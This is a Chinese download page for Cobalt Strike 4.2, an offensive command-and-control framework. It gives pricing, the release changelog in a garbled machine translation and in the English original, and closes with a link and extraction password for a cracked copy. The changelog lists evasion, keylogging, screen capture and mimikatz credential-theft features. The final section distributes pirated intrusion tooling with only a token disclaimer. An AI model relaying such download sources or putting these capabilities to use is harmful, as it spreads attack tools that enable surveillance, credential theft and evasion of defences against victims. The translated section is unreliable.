目录导航
此版本全面改革了我们的用户利用功能,为Beacon添加了更多的内存灵活性选项,为我们的利用后功能增加了更多的行为灵活性,并且对Malleable C2也做了一些不错的更改。
Cobalt Strike价格
新的Cobalt Strike许可费用为每位用户3500美元,为期一年。续订许可证的费用为每位用户每年2500美元。
cobaltstrike4.2更新日志
更新日期:2020年11月6日
Google智障翻译版本
---------------- +重构的Beacon反射式加载器,并添加了将rDLL加载器修补到其中的机制 信标(与代理一起运送静态加载器)。 +添加了阶段->分配器(VirtualAlloc,HeapAlloc或MapViewOfFile)进行设置 哪个分配器信标的RDLL加载程序将用于信标阶段。 + stage-> obfuscate现在对rDLL包中的.text部分进行模糊处理 +修复了由于缺少下载开始元数据而触发的客户端NPE +添加了Cobalt Strike客户端IP地址以加入events.log中的消息 +添加了-Dcobaltstrike.server_bindto = address(在teamserver脚本中,java命令) 更改团队服务器将绑定到的地址。默认值为0.0.0.0。 +团队服务器现在使用更具弹性的过程来编写其数据模型 +屏幕截图工具现在可以报告用户,会话和活动的窗口标题。 +更新了视图->屏幕截图和其他UX以使用屏幕截图上下文信息 +在视图中添加了突出显示颜色->屏幕截图 + http-post C2处理程序现在可以检测另一种损坏类型。 +为视图添加了色彩突出显示->下载 +在视图->击键中添加了颜色突出显示 +按键记录器现在可以报告用户和会话信息 +更新了视图->击键和其他UX以使用击键记录器上下文信息 +添加了从菜单通过界面“删除”屏幕截图或击键的选项 +将screenshots.log添加到带有截图元数据的日志/ [日期] / [目标] /文件夹中 +从击键日志中剥离了颜色代码,并添加了桌面会话/用户上下文 +为击键和屏幕快照浏览器的右键菜单添加了“保存”选项。 +将屏幕截图分成两个命令:屏幕截图和屏幕监视。屏幕截图需要 一个屏幕截图。屏幕监视程序会定期截图,直到终止 与jobkill命令。 +添加了printscreen命令以通过强制按下PrintScr和 从键盘上抓取内容。 +添加了post-ex-> thread_hint以生成具有指定模块的线程! 起始地址。影响浏览器数据透视表,键盘记录程序,网络,端口扫描和 powerpick / psinject后ex DLL。 +添加了事后->键盘记录器以设置按键记录方法。当前的选项是 SetWindowsHookEx和GetAsyncKeyState。 + post-ex->混淆功能现在可以在不需要时屏蔽DLL字符串, 在执行程序集,击键记录器,屏幕截图和SSH客户端DLL中。 +添加了阶段-> magic_mz_ [arch]和magic_pe以将MZ和PE标头值设置为 Beacon的DLL包中的其他内容。阅读有关MZ的文档 值必须是有效的可执行指令,可[应]修复任何更改 +为影响dns_ttl高值的操作添加了c2lint警告。 + HTTP和DNS C2特定的配置不再显示在其有效负载之外 +信标现在检测到http发布阻止请求失败,然后重试请求。 +重写DNS C2如何缓存和清除对话和条目的缓存。这个 修复了之前发送父域的服务器的DNS C2稳定性/性能 每个FQDN请求。对于Beacon来说,这就像签到一样,正在造成严重破坏。 +将remote-exec wmi实现为BOF。 +可锻C2配置文件中useragent字段的最大长度现在为255个字符。 +修复了DNS / HTTP Beacon配置中[可能]域被截断的错误(如果总数 指定域的长度超过255个字符。 + 8+年以来,我认为你们都应该从钴罢工中获得一些慷慨 产品。出于善意,我将http-get.client的最大大小增加了一倍, 您个人资料中的http-post.client程序。 +添加了headers_remove全局选项以强制Beacon的WinINet删除指定的 标头位于HTTP / S事务处理的后期。 +在HTTP Beacon代理配置对话框中添加了“这将进入您的配置”通知 +向&beacon_inline_execute添加了一个空的BOF内容完整性检查 +添加了rportfwd_local以创建用于启动连接和路由的端口转发 通过请求者的Cobalt Strike客户从信标到团队服务器。 +实现了spunnel和spunnel_local命令以生成shellcode和隧道 与指定控制器的连接。通过Cobalt Strike客户端将spunnel_local转发 并通过团队服务器转发。 +添加了枢轴套接字读取调节器,以将每次Beacon签入的读取循环限制为最大〜4s。 +错误修复链接模块读取功能 +对现有rportfwd实施进行了多项改进。 + rportfwd(和spunnel)现在对将rportfwd用于会话/端口非常友好 重新定义,而无需释放绑定的端口并重新绑定它。 +现在在特定于连接的线程上进行数据透视套接字写入,以防止会话 如果团队服务器端中继连接无响应或被阻止,则死锁。 +修复了袜子旋转子系统中的手柄泄漏 + DNS信标C2现在将丢弃不是A,AAAA或TXT的请求。 +添加了post-ex-> pipename Malleable C2选项以更改post-ex作业输出管道名称 +添加了set ssh_pipename来设置Cobalt Strike的SSH会话使用的命名管道 +代理服务器配置解析器现在去除尾随/(这会影响端口值)。 +可锻C2管道名称选项中的任何#现在都替换为随机的十六进制数字。 +修复了BeaconUseToken BOF API,以返回记录的BOOL +添加了BeaconSpawnTemporaryProcess BOF API。 +修复了从dcsync [domain]输出中提取凭据的解析器 +进行了更改以避免在进程注入中使用startrwx / userwx时不需要的VirtualProtect 阻止都是正确的。 + BOF可执行内存现在支持进程注入块中的startrwx / userwx提示 +添加了脚本挂钩以启用alt。我们在发行之间提供的mimikatz +更新为Mimikatz 2.2.0-20200918-修复 +大大减少了mimikatz-min和mimikatz-chrome DLL的大小。 +添加了chromedump别名以在mimikatz中运行dpapi :: chrome。 +如果子TCP Beacon进程“失败”,则提高了父Beacon的可恢复性 +将Vista +检查添加到Beacon控制台中的getsystem。 +浏览器枢轴HTTP代理现在可以通过视图->代理枢轴进行管理 +将&bmimikatz_small添加到了Aggressor脚本中。 +将查询网络接口的功能转移到BOF和核心信标之外 +为后RDLL加载程序添加了一些ptr清理。 +修复了SSH代理错误,其中会话有时被错误地报告为已提升 +添加了set data_jitter“ X”,通过添加以下内容来为Beacon的HTTP / S信标添加噪声 每个http-get的输出最多X个(每次随机)随机字节, http-post回应 + c2lint警告出现错误的进程注入->对于Windows XP时代的系统执行配置。 + post-ex-> obfuscate为true时,execute-assembly现在踩踏DOS标头 +添加了c2lint检查,以检查是否有危险的标头被http-config覆盖。
英文原版
----------------
+ Refactored Beacon Reflective Loader and added mechanism to patch rDLL loader into
Beacon (vs. shipping a static loader with the agent).
+ Added stage -> allocator (VirtualAlloc, HeapAlloc, or MapViewOfFile) to set
which allocator Beacon's RDLL loader will use for the Beacon stage.
+ stage -> obfuscate now obfuscates .text section in rDLL package
+ Fixed client NPE triggered by missing download start metadata
+ Added Cobalt Strike client IP address to join message in events.log
+ Added -Dcobaltstrike.server_bindto=address (in teamserver script, java command)
to change the address the team server will bind to. Default is 0.0.0.0.
+ Team server now uses a more resilient process to write its data model
+ Screenshot tool now reports user, session, and active window title.
+ Updated View -> Screenshots and other UX to use screenshot context info
+ Added color highlighting to View -> Screenshots
+ http-post C2 handler now detects another type of corruption.
+ Added color highlighting to View -> Downloads
+ Added color highlighting to View -> Keystrokes
+ Keystroke logger now reports user and session information
+ Updated View -> Keystrokes and other UX to use keylogger context info
+ Added option to "remove" screenshot or keystrokes from interface via menu
+ Added screenshots.log to logs/[date]/[target]/ folder with screenshot meta-data
+ Stripped color codes from keystroke logs and added desktop session/user context
+ Added Save option to keystroke and screenshot browser right-click menu.
+ Split screenshot into two commands: screenshot and screenwatch. screenshot takes
a single screenshot. screenwatch takes periodic screenshots until terminated
with jobkill command.
+ Added printscreen command to take screenshot by forcing PrintScr keypress and
grabbing contents from the keyboard.
+ Added post-ex -> thread_hint to spawn threads with specified module!func+offset
start address. Affects the browserpivot, keylogger, net, portscan, and
powerpick/psinject post-ex DLLs.
+ Added post-ex -> keylogger to set keystroke logging method. Current options are
SetWindowsHookEx and GetAsyncKeyState.
+ post-ex -> obfuscate now enables behavior to mask DLL strings, when not needed,
in execute-assembly, keystroke logger, screenshot, and SSH client DLLs.
+ Added stage -> magic_mz_[arch] and magic_pe to set the MZ and PE header values to
something else in Beacon's DLL package. Read the docs on this one as the MZ
values have to be valid executable instructions that [should] repair any changes
+ Added a c2lint warning for operation-impacting high dns_ttl values.
+ HTTP and DNS C2 specific configs no longer show up outside of their payloads
+ Beacon now detects http-post block request failures and tries requests again.
+ Rewrote how DNS C2 caches and clears cache of conversations and entries. This
fixes DNS C2 stability/performance for servers that send parent domain before
each FQDN request. It looked like a checkin to Beacon and was wreaking havoc.
+ Implemented remote-exec wmi as a BOF.
+ Max length of useragent field in Malleable C2 profile is now 255 characters.
+ Fixed bug with [possible] domain truncation in DNS/HTTP Beacon config if the total
length of the specified domains exceeded 255 characters.
+ 8+ years in and I think y'all deserve some generosity from the Cobalt Strike
product. As my kind act, I have doubled the max size of the http-get.client and
http-post.client programs in your profile.
+ Added headers_remove global option to force Beacon's WinINet to remove specified
headers late in the HTTP/S transaction process.
+ Added a "this goes into your config" notice to the HTTP Beacon proxy config dialog
+ Added an empty BOF content sanity check to &beacon_inline_execute
+ Added rportfwd_local to create a port forward that initiates connection and routes
from Beacon to team server onwards through the requester's Cobalt Strike client.
+ Implemented spunnel and spunnel_local commands to spawn shellcode and tunnel
connection to specified controller. spunnel_local forwards via Cobalt Strike client
and spunnel forwards via the team server.
+ Added pivot socket read governor to limit read loop to max ~4s per Beacon checkin.
+ Bug fixto link module read functions
+ Multiple improvements to existing rportfwd implementation.
+ rportfwd (and spunnel) are now friendly to having the rportfwd for a session/port
redefined without the need to release the bound port and rebind it.
+ Pivot socket writes now happen on a connection specific thread to prevent session
deadlock if the team server-side relayed connection becomes unresponsive or blocked.
+ Fixed a handle leak in socks pivoting sub-system
+ DNS Beacon C2 now drops requests that are not A, AAAA, or TXT.
+ Added post-ex -> pipename Malleable C2 option to change post-ex job output pipename
+ Added set ssh_pipename to set the named pipe used by Cobalt Strike's SSH sessions
+ Proxy server config parser now strips trailing / (which impacted the port value).
+ Any # in Malleable C2 pipename options is now replaced with a random hex digit.
+ Fixed BeaconUseToken BOF API to return a BOOL as documented
+ Added BeaconSpawnTemporaryProcess BOF API.
+ Fixed parser to extract creds from dcsync [domain] output
+ Made changes to avoid unneeded VirtualProtect when startrwx/userwx in process-inject
block are both true.
+ BOF executable memory now honors startrwx/userwx hints from process-inject block
+ Added script hook to enable use of alt. mimikatz, provided by us, between releases
+ Updated to Mimikatz 2.2.0-20200918-fix
+ Greatly reduced the size of mimikatz-min and mimikatz-chrome DLLs.
+ Added chromedump alias to run dpapi::chrome in mimikatz.
+ Improved recoverability of parent Beacon if a child TCP Beacon process "fails"
+ Added Vista+ check to getsystem in Beacon console.
+ Browser Pivot HTTP Proxy is now manageable via View -> Proxy Pivots
+ Added &bmimikatz_small to Aggressor Script.
+ Moved capability to query network interfaces to a BOF and out of core Beacon
+ Added some ptr cleanup to post-ex RDLL loaders.
+ Fixed SSH agent bug where session was sometimes incorrectly reported as elevated
+ Added set data_jitter "X" to add noise to Beacon's HTTP/S beaconing by adding
up to X (random each time) random bytes to the output of each http-get and
http-post response
+ c2lint warns for a bad process-inject -> execute config for Windows XP-era systems.
+ execute-assembly now stomps DOS header when post-ex -> obfuscate is true
+ Added c2lint check for dangerous headers to overwrite with http-config.
cobaltstrike4.2破解版下载地址
雨苁网盘: w.ddosi.workers.dev
解压密码: www.ddosi.org
切勿用于违法犯罪活动